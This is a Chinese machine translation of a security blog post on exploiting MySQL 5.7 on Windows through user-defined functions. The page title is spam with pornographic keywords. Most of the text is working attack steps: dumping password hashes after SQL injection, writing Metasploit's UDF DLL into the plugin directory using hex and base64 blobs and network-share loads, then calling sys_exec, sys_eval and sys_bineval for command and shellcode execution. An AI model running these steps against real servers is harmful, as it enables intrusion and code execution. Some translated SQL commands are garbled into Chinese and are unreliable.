压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

在現實世界中，當我登錄金融機構時，遇到了他們擁有內部Intranet并且使用MySQL 5.7 64位作為后端數據庫技術的場景。 大多數時候，我在大多數合作環境中遇到MSSQL，但這是一種罕見的情況。 我在Web應用程序中發現了SQL注入，并且我可以從mysql.user轉儲用戶名和密碼，并且我意識到它有權將文件寫入磁盤。 這導致我寫了一篇文章，并分享了向UDF庫注入MySQL并獲得代碼執行和在Windows中彈出一個shell的技巧。 當我谷歌搜索大多數技術有點模糊，當涉及到Windows。 所以，我想用我自己的研究來寫這篇文章來清除一些事情，并讓你明白一些可以手動使用的技巧。

當我在一臺主機上寫博客時，我將使用最新的MySQL 5.7.21服務器。為了重現該場景，我運行帶有’-secure-file-priv =’參數的mysqld，服務器設置為blank（不是NULL）。在這種情況下，我能夠在內部網使用中union注入，從mysql.user表中檢索用戶名和密碼。請注意，在MySQL 5.7及更高版本中，“密碼”列不存在。他們已將其更改為’authentication_string’。

# MySQL 5.6 and below
select host, user, password from mysql.user;
# MySQL 5.7 and above
select host, user, authentication_string from mysql.user;

請注意，如果您已擁有憑據，則可以使用metasploit的mysql_hashdump.rb輔助模塊來轉儲MySQL哈希值。 當我寫這篇博文時，腳本需要更新以便在MySQL 5.7中提取，您可以在這里查看我的pull請求

用戶’osanda’的主機列允許來自192.168.0。*的連接，這意味著我們可以使用該用戶從該IP范圍進行遠程連接。 我破解了密碼哈希并獲得了純文本密碼。

登錄到MySQL后，查看當前用戶的權限。

select * from mysql.user where user = substring_index(user(), '@', 1) ;

我們登錄的用戶擁有所有權限，并且我們有權讀取和寫入文件，在這些文件中您可以考慮編寫UDF DLL庫并獲得代碼執行。

什么是UDF庫

UDF表示MySQL中的用戶定義函數。這就像在DLL中編寫自己的函數并在MySQL中調用它們一樣。我們將使用可在Metasploit框架中找到的“lib_mysqludf_sys_64.dll”DLL庫。您可以使用基于Metasploit”/usr/share/metasploit-framework/data/exploits/mysql/”模塊。（https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql）

首先，我們必須檢查運行MySQL的體系結構。 全局變量’@@ version_compile_os’向我們展示了MySQL實例的體系結構，’@@ version_compile_machine’向我們展示了操作系統的體系結構。 在這種情況下，我們在64位Windows操作系統中運行64位版本的MySQL。

MySQL [(none)]> select @@version_compile_os, @@version_compile_machine;
+----------------------+---------------------------+
| @@version_compile_os | @@version_compile_machine |
+----------------------+---------------------------+
| Win64                | x86_64                    |
+----------------------+---------------------------+
MySQL [(none)]> show variables like '%compile%';
+-------------------------+--------+
| Variable_name           | Value  |
+-------------------------+--------+
| version_compile_machine | x86_64 |
| version_compile_os      | Win64  |
+-------------------------+--------+

從MySQL 5.0.67開始，UDF庫必須包含在plugin文件夾中，可以使用’@@ plugin_dir’全局變量找到它。 這個變量可以在mysql.ini文件中看到和編輯。

MySQL [(none)]> select @@plugin_dir ;
+--------------------------------------------------------------+
| @@plugin_dir                                                 |
+--------------------------------------------------------------+
| D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\ |
+--------------------------------------------------------------+
1 row in set (0.02 sec)

MySQL [(none)]> show variables like 'plugin%';
+---------------+--------------------------------------------------------------+
| Variable_name | Value                                                        |
+---------------+--------------------------------------------------------------+
| plugin_dir    | D:\MySQL\mysql-5.7.21-winx64\mysql-5.7.21-winx64\lib\plugin\ |
+---------------+--------------------------------------------------------------+

您可以通過將新值傳遞給mysqld來更改插件目錄變量。

mysqld.exe –plugin-dir=C:\\temp\\plugins\\

另一種方法是用plugin目錄編寫一個新的mysql配置文件并將其傳遞給mysqld。

mysqld.exe --defaults-file=C:\\temp\\my.ini

The content of the ‘my.ini’

[mysqld]
plugin_dir = C:\\temp\\plugins\\

在5.0.67之前的MySQL版本中，文件必須位于系統動態鏈接程序搜索的目錄中。 這同樣適用于4.1.25之前的MySQL版本。 以下是文檔中提到的文字。

從MySQL 5.0.67開始，文件必須位于插件目錄中。 該目錄由plugin_dir系統變量的值給出。 如果plugin_dir的值為空，則在5.0.67之前使用的行為適用：該文件必須位于由系統的動態鏈接程序搜索的目錄中。

從MySQL 4.1.25開始，文件必須位于插件目錄中。 該目錄由plugin_dir系統變量的值給出。 如果plugin_dir的值為空，則在4.1.25之前使用的行為適用：文件必須位于由系統的動態鏈接程序搜索的目錄中。

在舊版本中，您可以將DLL文件上傳到以下位置并創建新的UDF功能。

• @@datadir
• @@basedir\bin
• C:\windows
• C:\windows\system
• C:\windows\system32

上傳二進制文件

有很多可能的方法可以做到這一點。load_file函數支持網絡路徑。如果您可以將DLL復制到網絡共享中，您可以直接加載它并寫入磁盤。

select load_file('\\\\192.168.0.19\\network\\lib_mysqludf_sys_64.dll') into dumpfile "D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll";

第二種方法是用一個十六進制編碼的字符串將整個DLL文件寫入磁盤。

select hex(load_file('/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll')) into dumpfile '/tmp/udf.hex';

select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000… into dump file "D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll";

第三種方法是創建一個表并將二進制數據插入到十六進制編碼流中。 您可以嘗試在一個插入語句中編寫代碼或將其分解為多個部分，其中使用update語句來聯系二進制數據。

create table temp(data longblob);

insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);

update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);

select data from temp into dump file "D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll";

您也可以直接從磁盤將文件從網絡共享加載到上面創建的表中，或使用“加載數據infile”語句在本地加載。 像上面顯示的那樣將文件轉換為十六進制，并在寫入磁盤時取消對其的編輯。

load data infile '\\\\192.168.0.19\\network\\udf.hex' 
into table temp fields terminated by '@OsandaMalith' 
lines terminated by '@OsandaMalith' (data);

select unhex(data) from temp into dumpfile 'D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll';

從MySQL 5.6.1和MariaDB 10.0.5開始有好消息。 介紹了函數’to_base64’和’from_base64’。 如果你是一個喜歡繞過SQL注入WAFs的人，你可能已經在使用這些函數（提示：路由查詢注入）。

select to_base64(load_file('/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll')) 
into dumpfile '/tmp/udf.b64';

您可以編輯base64文件并添加以下行以轉儲到插件目錄。

select from_base64("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAAzwu3gd6ODs3ejg7N3o4OzafEQs3Wjg7Np8QCzfaODs2nxB7N1o4OzUGX4
s3Sjg7N3o4KzW6ODs2nxCrN2o4OzafEWs3Wjg7Np8RGzdqODs2nxErN2o4OzUmljaHejg7MAAAAA
AAAAAAAAAAAAAAAAUEUAAGSGBgBwsYNLAAAAAAAAAADwACIgCwIJAAASAAAAFgAAAAAAADQaAAAA
EAAAAAAAgAEAAAAAEAAAAAIAAAUAAgAAAAAABQACAAAAAAAAgAAAAAQAADPOAAACAEABAAAQAAAA
AAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAA5AAAFAgAAQDQAADwAAAAAYAAAsAIA
AABQAABoAQAAAAAAAAAAAAAAcAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAwAABwAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAR
EAAAABAAAAASAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAABQsAAAAwAAAADAAAABYAAAAA") 
into dumpfile "D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll";

之后，你可以像這樣將整個文件傳遞給mysql。

mysql -h192.168.0.30 -uosanda -pabc123 < /tmp/udf.b64

您也可以使用上面討論的“load data infile”語句直接從網絡共享或本地編寫base64編碼文件，并像這樣轉儲。

select from_base64(data) from temp 
into dumpfile 'D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll';

探索DLL

大多數時候我看到人們只寫關于Metasploit內部的這個DLL中的’sys_exec’函數。 為了好奇，我想到了扭轉這個DLL并探索其他功能。 如果我們檢查導出目錄，我們可以看到作者寫了幾個更有用的函數。 我會展示一些有用的功能。

sys_exec

該函數將在“系統”函數內傳遞參數’args-> args [0]’。 您可以使用它在目標機器上執行系統命令。

安裝

創建函數sys_exec返回int soname'udf.dll';

驗證

select * from mysql.func where name = 'sys_exec';
+----------+-----+---------+----------+
| name     | ret | dl      | type     |
+----------+-----+---------+----------+
| sys_exec |   2 | udf.dll | function |
+----------+-----+---------+----------+

刪除

drop function sys_exec;

sys_eval

該功能將執行系統命令并在屏幕上顯示傳遞給stdout。正如你可以使用這個函數一樣，使用_popen函數和’r’參數，calling process can read the spawned command’s standard output via the returned stream。它使用’fgets’來讀取pipe到緩沖區，它會返回緩沖區。

安裝

創建函數sys_eval返回字符串soname'udf.dll';

驗證

select * from mysql.func where name = 'sys_eval';

刪除

drop function sys_eval;

例子

select sys_eval('dir');

sys_get

該函數使用’getenv’函數返回系統變量的值。

安裝

創建函數sys_get返回字符串soname'udf.dll';

驗證

select * from mysql.func where name = 'sys_get';

刪除

Drop function sys_get;

例子

Select sys_get('longonserver');

Executing Shellcode – sys_bineval

我在這個DLL里面找到了一個很酷的函數’sys_bineval’。 該函數將使用’VirtualAlloc’API分配RWX內存，并使用’strcpy’將’args-> args [0]’復制到新分配的內存中。 然后這個緩沖區被傳遞給’CreateThread’API來產生一個新的線程。

如果我們看看’CreateThread’API，我們可以看到使用’strcpy’復制緩沖區的’lpParameter’作為指針傳遞給要傳遞給線程的變量。 ‘StartAddress’中的函數將直接移動’lpParamter’并調用ptr rax，這將改變RIP到我們的shellcode。

安裝

創建函數sys_bineval返回int soname'udf.dll';

驗證

select * from mysql.func where name = 'sys_bineval';

刪除

drop function sys_bineval;

例子

然而，我沒有得到這個工作在64位。 這在32位平臺中工作正常。 您可以直接打開原始二進制shellcode或編碼為base64或十六進制編碼并使用此功能執行。

select sys_bineval(from_base64(load_file('./calc.b64')));

我注意到這些外部UDF函數在拆解代碼中沒有適當的異常處理。 因此，在調用這些函數時稍有錯誤會導致mysqld.exe服務器崩潰。 我希望這篇文章可能對你有用，同時記錄下MySQL。

參考

http://ftp.nchu.edu.tw/MySQL/doc/refman/5.0/en/create-function-udf.html
http://ftp.nchu.edu.tw/MySQL/doc/refman/4.1/en/create-function-udf.html
https://docs.oracle.com/cd/E19078-01/mysql/mysql-refman-5.0/extending-mysql.html
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-1.html
https://dev.mysql.com/doc/refman/5.7/en/udf-arguments.html
https://msdn.microsoft.com/en-us/library/aa298534(v=vs.60).aspx

原文：https://osandamalith.com/2018/02/11/mysql-udf-exploitation/